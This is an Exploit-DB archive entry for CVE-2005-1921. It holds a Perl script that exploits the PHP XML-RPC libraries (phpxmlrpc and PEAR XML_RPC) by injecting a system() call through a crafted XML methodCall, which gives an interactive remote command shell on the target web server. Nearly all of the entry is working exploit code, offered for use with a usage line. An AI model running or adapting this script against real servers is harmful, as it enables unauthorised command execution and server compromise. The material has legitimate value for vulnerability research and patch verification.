XML-RPC Library 1.3.0 - 'xmlrpc.php' Remote Command Execution (3)

Author: Mike Rifone
type: webapps
platform: php
port: 
date_added: 2005-07-03  
date_updated: 2016-10-27  
verified: 1  
codes: CVE-2005-1921  
tags:   
aliases:   
screenshot_url:   
application_url: http://www.exploit-db.comxmlrpc-1.0.99.tar.gz  

raw file: 1084.pl  

#!/usr/bin/perl -w
# ********************************************************
# XML-RPC Remote Command Execution Exploit By Mike Rifone
# ********************************************************
# This works on da phpxmlrpc, and da PEAR XML_RPC too! All
# you need is to put the url to the server and u get shell
# Dis is my first exploit but hey it works :D ~Mike@Rifone
# ********************************************************

use LWP::UserAgent;

$brws = new LWP::UserAgent;
$brws->agent("Internet Explorer 6.0");

$host = $ARGV[0];

if ( !$host )
{
	die("Usage: xmlrpcexec.pl http://pathto/xmlrpcserver");
}

while ( $host )
{

	print "xmlrpc\@\#";

	$exec = <STDIN>;
	$data = "<?xml version=\"1.0\"?><methodCall><methodName>foo.bar</methodName><params><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><string>1</string></value></param><param><value><name>','')); system('$exec'); die; /*</name></value></param></params></methodCall>";

	$send = new HTTP::Request POST => $host;
	$send->content($data);
	$gots = $brws->request($send);
	$show = $gots->content;

	if ( $show =~ /<b>([\d]{1,10})<\/b><br \/>(.*)/is )
	{
	    print $2 . "\n";
	}
	else
	{
		print "$show\n";
	}


}

# milw0rm.com [2005-07-04]